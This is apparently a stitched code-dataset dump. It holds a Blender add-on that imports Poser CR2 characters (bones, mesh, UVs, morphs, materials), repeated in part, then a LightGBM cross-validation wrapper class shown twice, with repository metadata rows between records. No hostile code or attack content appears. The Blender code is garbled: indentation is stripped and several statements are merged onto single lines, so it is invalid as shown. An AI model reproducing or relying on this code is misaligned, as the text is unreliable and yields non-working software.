#print ('bone angles:', bone.angles.split())
#print ('bone origin:', bone.origin.split())
#print ('bone endpoint:', bone.endpoint.split())
#print ('bone xyz:', bone.xyz)
#print ('bone parent:', bone.parent)
#print ('orientation:', bone.orientation)
#print (cr2.bones[0].channels.xoffseta)
print ('========================================')
###########################################
#
# Create CR2 Running Data
#
###########################################
try:
bpy.CR2data.append([cr2.name, cr2])
except:
bpy.CR2data =[[cr2.name, cr2]]
#print (cr2.bones[0].xyz)
###########################################
#
# Final touches, Blender is all set up
#
###########################################
if self.externalMorph: #Attempt to load external morphs if they are found
if cr2.morphBinaryFile:
morphs=readPZMD(cr2.morphBinaryFile)
for morph in morphs:
ApplyMorph(ob, morph)
if self.zUp:#"Rotate model so Z is up",
if bpy.context.mode != 'OBJECT':
bpy.ops.object.mode_set(mode='OBJECT')
bpy.ops.object.select_all(action='DESELECT')
arm.select_set(True)
ob.select_set(True)
bpy.ops.transform.rotate(value=1.5708, orient_axis='X', orient_type='GLOBAL', orient_matrix=((1, 0, 0), (0, 1, 0), (0, 0, 1)), orient_matrix_type='GLOBAL', constraint_axis=(True, False, False), mirror=True, use_proportional_edit=False, proportional_edit_falloff='SMOOTH', proportional_size=1, use_proportional_connected=False, use_proportional_projected=False)
bpy.ops.object.select_all(action='DESELECT')
if self.pnu != 'PNU_0': # Scale the model
scale_factor=self.getScaleFactor()
if bpy.context.mode != 'OBJECT':
bpy.ops.object.mode_set(mode='OBJECT')
bpy.ops.object.select_all(action='DESELECT')
arm.select_set(True)
ob.select_set(True)
bpy.ops.transform.resize(value=(scale_factor, scale_factor, scale_factor), orient_type='GLOBAL', orient_matrix=((1, 0, 0), (0, 1, 0), (0, 0, 1)), orient_matrix_type='GLOBAL', mirror=True, use_proportional_edit=False, proportional_edit_falloff='SMOOTH', proportional_size=1, use_proportional_connected=False, use_proportional_projected=False)
bpy.ops.object.transform_apply(location=False, rotation=True, scale=True)
if self.prepare: #"Add armature modifier to the mesh",
if bpy.context.mode != 'OBJECT':
bpy.ops.object.mode_set(mode='OBJECT')
bpy.ops.object.select_all(action='DESELECT')
ob.select_set(True)
bpy.context.view_layer.objects.active = ob
#bpy.ops.object.modifier_add(type='WELD')
#bpy.context.object.modifiers["Weld"].merge_threshold = 0.0001
#bpy.context.object.modifiers["Weld"].show_expanded = False
bpy.ops.object.modifier_add(type='ARMATURE')
bpy.context.object.modifiers["Armature"].object = arm
bpy.ops.object.shade_smooth()
#select armature and set it as mesh parent
arm.select_set(True)
bpy.context.view_layer.objects.active = arm
bpy.ops.object.parent_set(type='OBJECT', keep_transform=False)
if self.rename: #"Rename bones and groups for Blender convention",
for vg in ob.vertex_groups:
new_name = re.sub(r'^([a-z])([A-Z])(.+)',r'\2\3.\1',vg.name)
if new_name == vg.name:
if vg.name.startswith('right'):
new_name = re.sub(r'^(right)([A-Z])(.+)',r'\2\3.r',vg.name)
elif vg.name.startswith('left'):
new_name = re.sub(r'^(left)([A-Z])(.+)',r'\2\3.l',vg.name)
print(vg.name, '->', new_name)
if new_name != vg.name:
vg.name = new_name
for vg in arm.data.bones:
new_name = re.sub(r'^([a-z])([A-Z])(.+)',r'\2\3.\1',vg.name)
if new_name == vg.name:
if vg.name.startswith('right'):
new_name = re.sub(r'^(right)([A-Z])(.+)',r'\2\3.r',vg.name)
elif vg.name.startswith('left'):
new_name = re.sub(r'^(left)([A-Z])(.+)',r'\2\3.l',vg.name)
print(vg.name, '->', new_name)
if new_name != vg.name:
vg.name = new_name
###########################################
#
# Really finished
#
###########################################
print ('len bones:', len(cr2.bones))
bpy.ops.object.mode_set(mode='OBJECT')
bpy.ops.object.select_all(action='DESELECT')
ob.select_set(True)
arm.select_set(True)
return {'FINISHED'}
def invoke(self, context, event):
###########################################
#
# Popup Read Character / Morphs
#
###########################################
context.window_manager.fileselect_add(self)
return {'RUNNING_MODAL'}
# Only needed if you want to add into a dynamic menu
def menu_func_import(self, context):
self.layout.operator(CharacterImport.bl_idname, text="Poser Character Importer")
def register():
bpy.utils.register_class(CharacterImport)
bpy.types.TOPBAR_MT_file_import.append(menu_func_import)
def unregister():
bpy.utils.unregister_class(CharacterImport)
bpy.types.TOPBAR_MT_file_import.remove(menu_func_import)
if __name__ == "__main__":
register()
| 35.84818
| 373
| 0.436063
|
import bpy
import time
import os
import re
from mathutils import *
from math import *
from bpy_extras import *
from bpy_extras.image_utils import load_image
from bpy.props import StringProperty, BoolProperty, EnumProperty
import sys
local_module_path=os.path.join(os.path.dirname(os.path.abspath(__file__)),'libs')
if local_module_path not in sys.path:
sys.path.append(local_module_path)
import PT2_open as ptl
import RuntimeFolder as Runtime
import GetStringRes
import shaderTrees as st
import shaderTreeParser as stp
import createBlenderMaterialfromP4 as cbm4
from ApplyMorph import ApplyMorph
from ReadPZMD import *
print ('\n')
print ('--- Starting Poser Character Importer Version 3 ---')
bpy.cr2count = 0
###########################################
#
# CR2 Class
#
###########################################
class CR2Class():
def __init__(self):
self.geompath = ''
self.morphBinaryFile = ''
self.name = ''
self.geomData = geomData()
# self.materialData = materialData()
# self.channels = channels()
self.materials = []
self.bones = []
class geomData():
def __init__(self):
self.verts = []
self.UVverts = []
self.faces = []
class materialData():
def __init__(self):
self.color = 55
self.alpha = 75
class boneData():
def __init__(self):
self.xyz = ''
self.name = ''
self.parent = ''
self.endpoint = ''
self.origin = ''
self.orientation = ''
self.angles = ''
class channels():
def __init__(self):
PBM = 'partial body morph'
xoffseta = 0
#xyz = []
# Example Fuction
def xfactor(xyz):
value=xyz*5
return(value)
###########################################
#
# Import Character Class
#
###########################################
class CharacterImport(bpy.types.Operator):
#time_start = time.time()
bl_idname = "import.poser_cr2"
bl_label = "Load Character"
filename_ext = ".CR2"
filter_glob : StringProperty(default="*.cr2;*.crz", options={'HIDDEN'})
filepath : bpy.props.StringProperty(subtype="FILE_PATH")
overwrite: BoolProperty(
name="Overwrite Materials",
description="Overwrite current materials with the same name",
default=False,
)
externalMorph: BoolProperty(
name="Load External Morphs",
description="Attempt to load external morphs if they are found",
default=True,
)
zUp: BoolProperty(
name="Fix Orientation",
description="Rotate model so Z is up",
default=True,
)
prepare: BoolProperty(
name="Prepare Model",
description="Add armature modifier to the mesh",
default=True,
)
rename: BoolProperty(
name="Rename Bones",
description="Rename bones and groups for Blender convention",
default=True,
)
pnu: EnumProperty(
name="Scale Factor",
description="",
items=(
('PNU_0', "No Scale", "Import model without scaling"),
('PNU_4', "Poser 4 Scale", "1 PNU = 8 feet (or 96 inches/2.43 meters)"),
('GEEP' , "Dr Geep Scale", "1 PNU = 8 feet 4 inches (or 100 inches/2.54 meters)"),
('PNU_6', "Poser 6+ Scale", "1 PNU = 8.6 feet (or 103.2 inches/2.62 meters)"),
),
default='GEEP'
)
def __init__(self):
self.PropArray = []
def getScaleFactor(self):
bnu = bpy.context.scene.unit_settings.scale_length
if self.pnu == 'GEEP':
scale_factor = 100 * 0.0254 / bnu
elif self.pnu == 'PNU_4':
scale_factor = 96 * 0.0254 / bnu
elif self.pnu == 'PNU_6':
scale_factor = 103.2 * 0.0254 / bnu
else:
scale_factor = 1
return(scale_factor)
def execute(self, context):
cr2 = CR2Class()
print ('\n\n')
print ('===================================================================')
print ('Scale Factor = ', self.getScaleFactor() )
#########################################
#
# Scan for multi obj's first:
print ('filepath:', self.filepath)
runtime = Runtime.Runtime(self.filepath)
CharName = os.path.basename(self.filepath)[:-4] print ('CharName:', CharName)
file = ptl.PT2_open(self.filepath, 'rt')
morphcounts = []
propcounts = []
for y in file:
x=y.strip()
if x.startswith('actor ') is True:
tempstr = x
tempstr = tempstr.replace('actor ', '')
skipcheck = False
tempstr = ptl.namecheck01(tempstr)
if len(cr2.bones) > 0:
for bone in cr2.bones:
if bone.name == tempstr:
skipcheck = True
if skipcheck == False:
cr2.bones.append(boneData())
bonecount = len(cr2.bones)
thisbone = cr2.bones[bonecount-1]
tempstr = ptl.namecheck01(tempstr)
thisbone.name = tempstr
elif x.startswith('targetGeom ') is True:
tempstr = x
if morphcounts.__contains__(tempstr) is False:
morphcounts.append(tempstr)
elif x.startswith('prop ') is True:
tempstr = x
if propcounts.__contains__(tempstr) is False:
propcounts.append(tempstr)
elif x.startswith('figureResFile ') is True:
tempstr = x.replace(r'figureResFile ', '')
cr2.geompath = tempstr.strip('"')
# print ('GeomFile:', cr2.geompath)
elif x.startswith('morphBinaryFile ') is True:
tempstr = x.replace('morphBinaryFile ', '')
cr2.morphBinaryFile = runtime.find_runtime_path( tempstr.strip('"') )
print ('External Morph File:', cr2.morphBinaryFile)
file.close()
print ('Number of Morphs:', len(morphcounts))
print ('Number of Props:', len(propcounts))
print ('=======')
for prop in propcounts:
print (prop)
print ('-------------')
depth = 0 blacklist = ['baseProp', 'controlProp', 'hairGrowthGroup', 'magnetDeformerProp',
'setGeomHandlerOffset', 'sphereZoneProp', 'prop', 'alternateGeom']
current_mat = 'No Mat'
raw_mats = [] mat_name = ''
mats = {}
comps = [] readcomps = False
mat_depth = 0
morphs = []
morph = Morph()
morphloop = -1
current_morph = ''
mtrx_swap = Matrix((( 1, 0, 0, 0),
( 0, 1, 0, 0),
( 0, 0, 1, 0),
( 0, 0, 0, 1)) )
file = ptl.PT2_open(self.filepath, 'rt')
figureCheck = False
currentActor=''
for y in file: x = y.strip() try:
(keyword, args) = x.split(maxsplit=1)
except ValueError: keyword = x
if keyword in blacklist and depth == 1:
while True: x=next(file).strip()
if x.startswith('{'):
depth += 1
elif x.startswith('}'):
depth -= 1
if depth < 2:
break
elif keyword == 'actor':
currentActor = ptl.namecheck01(args)
for bone in cr2.bones:
if bone.name == currentActor:
currentbone = bone
outstr = str(currentbone.name) + ':'
elif keyword == 'angles':
currentbone.angles = args
elif keyword == 'origin':
currentbone.origin = args
elif keyword == 'endPoint':
currentbone.endpoint = args
elif keyword == 'parent'or keyword == 'nonInkyParent':
currentbone.parent = ptl.namecheck01(args)
elif keyword == 'orientation':
currentbone.orientation = args
elif x.startswith('twistX twistx'):
tempstr = x.replace(' ', '_')
currentbone.xyz = currentbone.xyz + tempstr + ' '
elif x.startswith('twistY twisty'):
tempstr = x
tempstr = tempstr.replace(' ', '_')
currentbone.xyz = currentbone.xyz + tempstr + ' '
elif x.startswith('twistZ twistz'):
tempstr = x
tempstr = tempstr.replace(' ', '_')
currentbone.xyz = currentbone.xyz + tempstr + ' '
elif x.startswith('jointX jointx'):
tempstr = x
tempstr = tempstr.replace(' ', '_')
currentbone.xyz = currentbone.xyz + tempstr + ' '
elif x.startswith('jointY jointy'):
tempstr = x
tempstr = tempstr.replace(' ', '_')
currentbone.xyz = currentbone.xyz + tempstr + ' '
elif x.startswith('jointZ jointz'):
tempstr = x
tempstr = tempstr.replace(' ', '_')
currentbone.xyz = currentbone.xyz + tempstr + ' '
elif keyword == 'figure' and figureCheck == False:
figureCheck = True
elif keyword == 'name' and figureCheck == True:
if not args.startswith('Figure'):
CharName = args
figureCheck = False
elif keyword == 'targetGeom':
morph.name = args
morphloop = depth
morph.group = currentActor
elif keyword == 'k' and depth >= morphloop:
morph.value = float(x.split()[2])
elif keyword == 'min' and depth >= morphloop:
morph.min = float(x.split()[1])
elif keyword == 'max' and depth >= morphloop:
morph.max = float(x.split()[1])
elif keyword == 'trackingScale' and depth >= morphloop:
morph.trackingScale = float(x.split()[1])
elif keyword == 'd' and depth >= morphloop:
i, dx, dy, dz = [float(s) for s in args.split()]
morph.deltas.append( { int(i) : Vector( (dx, dy, dz) ) } )
elif keyword == 'indexes' and depth >= morphloop:
morph.indexes = float(args)
elif keyword == 'numbDeltas' and depth >= morphloop:
morph.numbDeltas = float(args)
elif keyword == '{':
depth += 1
elif keyword == '}':
depth -= 1
if morphloop >= depth:
morphloop = -1
morphs.append(morph)
morph = Morph()
elif keyword == 'material':
readcomps = True mat_name = args
print ('Mat Name:', mat_name)
while readcomps:
line = next(file).strip()
if line.startswith('{') is True and readcomps is True:
mat_depth += 1
elif line.startswith('}') is True and mat_depth > 0:
mat_depth -= 1
comps.append([mat_depth, line.split()])
if mat_depth == 0 and readcomps is True:
readcomps=False
raw_mats.append([mat_name, comps])
mat_name = ''
comps = []
file.close()
bpy.cr2count = bpy.cr2count + 1
cr2.name = CharName + str(bpy.cr2count)
print ('\nCharacter:', cr2.name)
print ('=======================================')
print (bpy.context.mode)
if bpy.context.mode != 'OBJECT':
bpy.ops.object.mode_set(mode='OBJECT')
print ("Creating Armature 3")
arm = bpy.data.armatures.new(cr2.name)
object_utils.object_data_add(context, arm, operator=None)
bpy.context.view_layer.update()
arm = bpy.context.active_object
arm.location.x = 0
arm.location.y = 0
arm.location.z = 0
arm.data.display_type = 'STICK'
arm.show_in_front = True
print (arm)
arm.name = cr2.name
armdata = arm.data
armdata.name = "Arm_data_"+cr2.name
if bpy.context.mode != 'EDIT_MODE':
bpy.ops.object.mode_set(mode='EDIT')
bones = armdata.edit_bones
for bone in cr2.bones:
if bone.origin == '':
pass
elif bone.name.startswith('bodyMorphs'):
pass
else:
ebone = bones.new(bone.name)
ebone.head = [float(s) for s in bone.origin.split()]
ebone.tail = [float(s) for s in bone.endpoint.split()]
ebone.head_radius = 0.02
ebone.tail_radius = 0.02
ebone.envelope_distance = 0.05
pass
xyzprop = bone.xyz.split()
xyz = ''
if len(xyzprop) > 2:
if xyzprop[0].__contains__('X'):
xyzprop[0] = 'X'
if xyzprop[1].__contains__('X'):
xyzprop[1] = 'X'
if xyzprop[2].__contains__('X'):
xyzprop[2] = 'X'
if xyzprop[0].__contains__('Y'):
xyzprop[0] = 'Y'
if xyzprop[1].__contains__('Y'):
xyzprop[1] = 'Y'
if xyzprop[2].__contains__('Y'):
xyzprop[2] = 'Y'
if xyzprop[0].__contains__('Z'):
xyzprop[0] = 'Z'
if xyzprop[1].__contains__('Z'):
xyzprop[1] = 'Z'
if xyzprop[2].__contains__('Z'):
xyzprop[2] = 'Z'
xyz = xyzprop[0] + xyzprop[1] + xyzprop[2]
bone = ebone
bone["joint order"] = xyz
try:
bonerollaxis = bone["joint order"][1]
flip = False
if bonerollaxis == 'Z':
flip = True
ebone.select = True
bpy.ops.armature.calculate_roll(type=bonerollaxis)
ebone.select = False
except:
pass
print ('\n------- parenting bones ------------')
for bone in cr2.bones:
try:
child = bones.get(bone.name)
parent = bones.get(bone.parent)
child.parent = parent
except:
pass
bpy.ops.object.mode_set(mode='EDIT')
arm = bpy.context.active_object
bones = arm.data.edit_bones
temp = []
xyza = []
for bone in bones:
temp = [bone.name, bone["joint order"]]
xyza.append(temp)
temp = []
bpy.ops.object.mode_set(mode='POSE')
pbones = arm.pose.bones
for value in xyza:
if value[1] != '':
pbones[value[0]]["joint order"] = value[1]
for bone in pbones:
bone["bend"] = 1
bone["side"] = 1
bone["twist"] = 1
print ('\n\n')
print ('==================================================================')
print ('=')
print ('= Creating Mesh ')
print ('=')
print ('==================================================================')
char = bpy.context.active_object
char['GeomPath'] = cr2.geompath
print (self.filepath)
print ('geompath:', cr2.geompath)
fullgeompath=runtime.find_runtime_path(cr2.geompath)
print(fullgeompath)
vertcount = 0
facecount = 0
facearray = []
UVvertices = []
verts = []
current_group = ''
file3 = ptl.PT2_open(fullgeompath, 'rt')
for temp in file3:
temparray2 = []
if temp.startswith('v '):
vert = temp.split()
vert.remove('v')
vert = [float(i) for i in vert]
vert = tuple(vert)
cr2.geomData.verts.append(vert)
elif temp.startswith('old_f '):
face = temp.split()
face.remove('f')
tempface = []
for vert in face:
vert2 = vert.split('/')
tempface.append(int(vert2[0])-1)
if len(tempface) > 4:
print ('Fgon Warning!!')
print (tempface)
else:
cr2.geomData.faces.append(tempface)
elif temp.startswith('f ') is True:
tempstr1 = current_mat
tempstr2 = temp.lstrip('f ')
tempstr3 = current_group
facearray.append([tempstr1, tempstr2, tempstr3])
elif temp.startswith('old_vt '):
uvvert = temp.split()
uvvert.remove('vt')
uvvert = [float(i) for i in uvvert]
cr2.geomData.UVverts.append(uvvert)
elif temp.startswith('vt ') is True:
tempstr = temp.lstrip('vt ')
temparray1 = [float(s) for s in tempstr.split()]
temparray2.append(temparray1[0])
temparray2.append(temparray1[1])
UVvertices.append(temparray2)
elif temp.startswith('usemtl ') is True:
current_mat = temp.split()[1]
elif temp.startswith('g ') is True:
try:
tempstr = temp.split()[1]
except IndexError:
tempstr = 'Null' current_group = tempstr
print (facearray[1])
mesh = bpy.data.meshes.new(cr2.name+':Mesh')
ob = bpy.data.objects.new(cr2.name+':Object', mesh)
ob.data['morphFile']=cr2.morphBinaryFile
scn = bpy.context.scene bpy.context.view_layer.active_layer_collection.collection.objects.link(ob)
mesh.from_pydata(cr2.geomData.verts, [], cr2.geomData.faces)
mesh.update(calc_edges=True)
facecount = 0
extrafaces = []
extrafacecount = 1
print ('-----------------------------------')
textureverts = []
faces = []
face_mat = []
textureverts = []
for face in facearray:
TempTextureVerts = []
temparray = []
facemat = face[0] vertlist = face[1] eachvert = vertlist.split() geomface = []
for y in eachvert:
splitverts = y.split('/') geomface.append(splitverts[0]) if len(splitverts) > 1:
TempTextureVerts.append(splitverts[1])
else:
TempTextureVerts.append(0)
for vert in geomface:
temparray.append(int(vert)-1)
if len(temparray) < 5:
faces.append(temparray) temp_mat_array = [facecount, facemat] face_mat.append(temp_mat_array) textureverts.append(TempTextureVerts) facecount = facecount + 1
else:
y = len(temparray)
faces.append([temparray[0], temparray[1], temparray[2]]) if len(TempTextureVerts) > 0:
textureverts.append([TempTextureVerts[0], TempTextureVerts[1], TempTextureVerts[2]]) temp_mat_array = [facecount, facemat] face_mat.append(temp_mat_array) facecount = facecount + 1
for q in range(2,y-1):
faces.append([temparray[0], temparray[q], temparray[q+1]])
if len(TempTextureVerts) > 0:
textureverts.append([TempTextureVerts[0], TempTextureVerts[q], TempTextureVerts[q+1]]) temp_mat_array = [facecount, facemat] face_mat.append(temp_mat_array) facecount = facecount + 1
vg = ob.vertex_groups
groupname = face[2]
g_exists = False
if len(vg) > 0:
for g in vg:
if g.name == groupname:
g_exists = True
if g_exists == True:
pass
else:
vg.new(name=groupname)
for y in eachvert:
splitverts = y.split('/')
vg[groupname].add([int(splitverts[0])-1], 1, 'ADD')
mesh.from_pydata(verts, [], faces)
mesh.update()
facecount = 0
longfaces = []
if( len(UVvertices) > 0 ):
uvlayer = mesh.uv_layers.new()
if uvlayer:
mesh.uv_layers.active = uvlayer
facecount = 0
longfaces = []
for face in mesh.polygons:
k=0
for vert_idx, loop_idx in zip(face.vertices, face.loop_indices):
textureindex = int(textureverts[face.index][k])-1
mesh.uv_layers.active.data[loop_idx].uv = UVvertices[textureindex]
k+=1
print ('\n')
print ('==================================================')
print ('= Creating Shapekeys =')
print ('==================================================')
for morph in morphs:
ApplyMorph(ob, morph, mtrx_swap=mtrx_swap )
doMaterials = True
if doMaterials:
print ('==================================================')
print ('= Creating Materials =')
print ('==================================================')
time_start = time.time()
mat_name_map = {}
bpy.PT2_raw_mats = raw_mats
bpy.PT2_mats={} # save the parsed array into the bpy for future use
for raw_mat in raw_mats: # raw_mat[0] contains material name
bpy.PT2_mats[raw_mat[0]] = stp.parseMaterial( iter(raw_mat[1]), raw_mat[0] )
# print(raw_mat[0], type(bpy.PT2_mats[raw_mat[0]]))
mat1 = cbm4.createBlenderMaterialfromP4(raw_mat[0], bpy.PT2_mats[raw_mat[0]], runtime, overwrite=self.overwrite)
mat_name_map[mat1.name] = raw_mat[0]
####################################################################################################################
if mesh.materials.__contains__(raw_mat[0]):
#print ('True')
skip = 1
else:
mesh.materials.append(mat1)
skip = 1
#print ('False')
#############################################################
#
# Assign faces to materials
#
#print ('\n')
#print ('==================================================')
#print ('= Assigning Faces to Materials =')
#print ('==================================================')
#print ('len of face_mat:', len(face_mat))
for face in face_mat:
#print (face)
mat_count = 0
for mat in mesh.materials:
skip = 1
if mat_name_map[mat.name] == face[1]:
mesh.polygons[face[0]].material_index = mat_count
mat_count = mat_count + 1
##########################################################
##########################################################
print ('Time to create Materials:', time.time()-time_start)
#print ('\n\n')
#print ('Len of verts:', len(cr2.geomData.verts))
#print ('Sample Vert:', cr2.geomData.verts[0])
#print ('Len of faces:', len(cr2.geomData.faces))
#print ('sample face:', cr2.geomData.faces[0])
#try:
# print ('Len of UVVerts:', len(cr2.geomData.UVverts))
# print ('sample UVvert:', cr2.geomData.UVverts[0])
#except:
# pass
bpy.ops.object.mode_set(mode='OBJECT')
print ('=========================================================\n\n')
###########################################
#
# Clear Variables / prevents multiple mesh contamination
#
###########################################
cr2.geomData.faces = []
cr2.geomData.verts = []
cr2.geomData.UVverts = []
###########################################
#
# Create Materials
#
###########################################
###########################################
#
# Apply mats to Geometry
#
###########################################
##############################################
#
# Results:
#
##############################################
print ('Results:')
print ('geompath:', cr2.geompath)
print ('morphPath:', cr2.morphBinaryFile)
#print ('gemodata.verts:', cr2.geomData.verts)
#for bone in cr2.bones:
#print ('--------------------------')
#print ('bone name:', bone.name)
#print ('bone angles:', bone.angles.split())
#print ('bone origin:', bone.origin.split())
#print ('bone endpoint:', bone.endpoint.split())
#print ('bone xyz:', bone.xyz)
#print ('bone parent:', bone.parent)
#print ('orientation:', bone.orientation)
#print (cr2.bones[0].channels.xoffseta)
print ('========================================')
###########################################
#
# Create CR2 Running Data
#
###########################################
try:
bpy.CR2data.append([cr2.name, cr2])
except:
bpy.CR2data =[[cr2.name, cr2]]
#print (cr2.bones[0].xyz)
###########################################
#
# Final touches, Blender is all set up
#
###########################################
if self.externalMorph: #Attempt to load external morphs if they are found
if cr2.morphBinaryFile:
morphs=readPZMD(cr2.morphBinaryFile)
for morph in morphs:
ApplyMorph(ob, morph)
if self.zUp:#"Rotate model so Z is up",
if bpy.context.mode != 'OBJECT':
bpy.ops.object.mode_set(mode='OBJECT')
bpy.ops.object.select_all(action='DESELECT')
arm.select_set(True)
ob.select_set(True)
bpy.ops.transform.rotate(value=1.5708, orient_axis='X', orient_type='GLOBAL', orient_matrix=((1, 0, 0), (0, 1, 0), (0, 0, 1)), orient_matrix_type='GLOBAL', constraint_axis=(True, False, False), mirror=True, use_proportional_edit=False, proportional_edit_falloff='SMOOTH', proportional_size=1, use_proportional_connected=False, use_proportional_projected=False)
bpy.ops.object.select_all(action='DESELECT')
if self.pnu != 'PNU_0': # Scale the model
scale_factor=self.getScaleFactor()
if bpy.context.mode != 'OBJECT':
bpy.ops.object.mode_set(mode='OBJECT')
bpy.ops.object.select_all(action='DESELECT')
arm.select_set(True)
ob.select_set(True)
bpy.ops.transform.resize(value=(scale_factor, scale_factor, scale_factor), orient_type='GLOBAL', orient_matrix=((1, 0, 0), (0, 1, 0), (0, 0, 1)), orient_matrix_type='GLOBAL', mirror=True, use_proportional_edit=False, proportional_edit_falloff='SMOOTH', proportional_size=1, use_proportional_connected=False, use_proportional_projected=False)
bpy.ops.object.transform_apply(location=False, rotation=True, scale=True)
if self.prepare: #"Add armature modifier to the mesh",
if bpy.context.mode != 'OBJECT':
bpy.ops.object.mode_set(mode='OBJECT')
bpy.ops.object.select_all(action='DESELECT')
ob.select_set(True)
bpy.context.view_layer.objects.active = ob
#bpy.ops.object.modifier_add(type='WELD')
#bpy.context.object.modifiers["Weld"].merge_threshold = 0.0001
#bpy.context.object.modifiers["Weld"].show_expanded = False
bpy.ops.object.modifier_add(type='ARMATURE')
bpy.context.object.modifiers["Armature"].object = arm
bpy.ops.object.shade_smooth()
#select armature and set it as mesh parent
arm.select_set(True)
bpy.context.view_layer.objects.active = arm
bpy.ops.object.parent_set(type='OBJECT', keep_transform=False)
if self.rename: #"Rename bones and groups for Blender convention",
for vg in ob.vertex_groups:
new_name = re.sub(r'^([a-z])([A-Z])(.+)',r'\2\3.\1',vg.name)
if new_name == vg.name:
if vg.name.startswith('right'):
new_name = re.sub(r'^(right)([A-Z])(.+)',r'\2\3.r',vg.name)
elif vg.name.startswith('left'):
new_name = re.sub(r'^(left)([A-Z])(.+)',r'\2\3.l',vg.name)
print(vg.name, '->', new_name)
if new_name != vg.name:
vg.name = new_name
for vg in arm.data.bones:
new_name = re.sub(r'^([a-z])([A-Z])(.+)',r'\2\3.\1',vg.name)
if new_name == vg.name:
if vg.name.startswith('right'):
new_name = re.sub(r'^(right)([A-Z])(.+)',r'\2\3.r',vg.name)
elif vg.name.startswith('left'):
new_name = re.sub(r'^(left)([A-Z])(.+)',r'\2\3.l',vg.name)
print(vg.name, '->', new_name)
if new_name != vg.name:
vg.name = new_name
###########################################
#
# Really finished
#
###########################################
print ('len bones:', len(cr2.bones))
bpy.ops.object.mode_set(mode='OBJECT')
bpy.ops.object.select_all(action='DESELECT')
ob.select_set(True)
arm.select_set(True)
return {'FINISHED'}
def invoke(self, context, event):
###########################################
#
# Popup Read Character / Morphs
#
###########################################
context.window_manager.fileselect_add(self)
return {'RUNNING_MODAL'}
# Only needed if you want to add into a dynamic menu
def menu_func_import(self, context):
self.layout.operator(CharacterImport.bl_idname, text="Poser Character Importer")
def register():
bpy.utils.register_class(CharacterImport)
bpy.types.TOPBAR_MT_file_import.append(menu_func_import)
def unregister():
bpy.utils.unregister_class(CharacterImport)
bpy.types.TOPBAR_MT_file_import.remove(menu_func_import)
if __name__ == "__main__":
register()
| true
| true
|
1c48fe87fdf6baca4133977f3a2e53032a912fe9
| 2,264
|
py
|
Python
|
xam/ensemble/lgbm_cv.py
|
topolphukhanh/xam
|
3fa958ba8b0c8e8e266cac9997b7a7d0c309f55c
|
[
"MIT"
] | 357
|
2017-03-23T19:07:31.000Z
|
2022-03-11T09:08:07.000Z
|
xam/ensemble/lgbm_cv.py
|
topolphukhanh/xam
|
3fa958ba8b0c8e8e266cac9997b7a7d0c309f55c
|
[
"MIT"
] | 8
|
2018-07-05T09:18:36.000Z
|
2022-03-04T05:10:09.000Z
|
xam/ensemble/lgbm_cv.py
|
topolphukhanh/xam
|
3fa958ba8b0c8e8e266cac9997b7a7d0c309f55c
|
[
"MIT"
] | 89
|
2017-03-24T22:12:39.000Z
|
2022-02-14T15:47:41.000Z
|
import lightgbm as lgbm
import numpy as np
import pandas as pd
from sklearn import model_selection
from sklearn import utils
class LGBMCV():
def __init__(self, cv=model_selection.KFold(n_splits=5, shuffle=True), **kwargs):
self.cv = cv
self.lgbm_params = kwargs
def fit(self, X, y=None, **kwargs):
self.models_ = []
feature_names = X.columns if isinstance(X, pd.DataFrame) else list(range(X.shape[1]))
self.feature_importances_ = pd.DataFrame(index=feature_names)
self.evals_results_ = {}
for i, (fit_idx, val_idx) in enumerate(self.cv.split(X, y)):
# Split the dataset according to the fold indexes
if isinstance(X, pd.DataFrame):
X_fit = X.iloc[fit_idx]
X_val = X.iloc[val_idx]
else:
X_fit = X[fit_idx]
X_val = X[val_idx]
if isinstance(y, pd.Series):
y_fit = y.iloc[fit_idx]
y_val = y.iloc[val_idx]
else:
y_fit = y[fit_idx]
y_val = y[val_idx]
# https://lightgbm.readthedocs.io/en/latest/Python-API.html#lightgbm.Dataset
fit_set = lgbm.Dataset(X_fit, y_fit)
val_set = lgbm.Dataset(X_val, y_val)
# https://lightgbm.readthedocs.io/en/latest/Python-API.html#lightgbm.train
self.evals_results_[i] = {}
model = lgbm.train(
params=self.lgbm_params,
train_set=fit_set,
valid_sets=(fit_set, val_set),
valid_names=('fit', 'val'),
evals_result=self.evals_results_[i],
**kwargs
)
# Store the feature importances
self.feature_importances_['gain_{}'.format(i)] = model.feature_importance('gain')
self.feature_importances_['split_{}'.format(i)] = model.feature_importance('split')
# Store the model
self.models_.append(model)
return self
def predict(self, X):
utils.validation.check_is_fitted(self, ['models_'])
y = np.zeros(len(X))
for model in self.models_:
y += model.predict(X)
return y / len(self.models_)
| 31.444444
| 95
| 0.565813
|
import lightgbm as lgbm
import numpy as np
import pandas as pd
from sklearn import model_selection
from sklearn import utils
class LGBMCV():
def __init__(self, cv=model_selection.KFold(n_splits=5, shuffle=True), **kwargs):
self.cv = cv
self.lgbm_params = kwargs
def fit(self, X, y=None, **kwargs):
self.models_ = []
feature_names = X.columns if isinstance(X, pd.DataFrame) else list(range(X.shape[1]))
self.feature_importances_ = pd.DataFrame(index=feature_names)
self.evals_results_ = {}
for i, (fit_idx, val_idx) in enumerate(self.cv.split(X, y)):
if isinstance(X, pd.DataFrame):
X_fit = X.iloc[fit_idx]
X_val = X.iloc[val_idx]
else:
X_fit = X[fit_idx]
X_val = X[val_idx]
if isinstance(y, pd.Series):
y_fit = y.iloc[fit_idx]
y_val = y.iloc[val_idx]
else:
y_fit = y[fit_idx]
y_val = y[val_idx]
fit_set = lgbm.Dataset(X_fit, y_fit)
val_set = lgbm.Dataset(X_val, y_val)
self.evals_results_[i] = {}
model = lgbm.train(
params=self.lgbm_params,
train_set=fit_set,
valid_sets=(fit_set, val_set),
valid_names=('fit', 'val'),
evals_result=self.evals_results_[i],
**kwargs
)
self.feature_importances_['gain_{}'.format(i)] = model.feature_importance('gain')
self.feature_importances_['split_{}'.format(i)] = model.feature_importance('split')
self.models_.append(model)
return self
def predict(self, X):
utils.validation.check_is_fitted(self, ['models_'])
y = np.zeros(len(X))
for model in self.models_:
y += model.predict(X)
return y / len(self.models_)
| true
| true
|
1c48ff1a98a5fae415b1409b2b640b5362bdfe08
| 2,357
|
py
|
Python
|
chrome/common/extensions/docs/server2/redirector.py
|
kurli/chromium-crosswalk
|
f4c5d15d49d02b74eb834325e4dff50b16b53243
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 2
|
2018-11-24T07:58:44.000Z
|
2019-02-22T21:02:46.000Z
|
chrome/common/extensions/docs/server2/redirector.py
|
carlosavignano/android_external_chromium_org
|
2b5652f7889ccad0fbdb1d52b04bad4c23769547
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null |
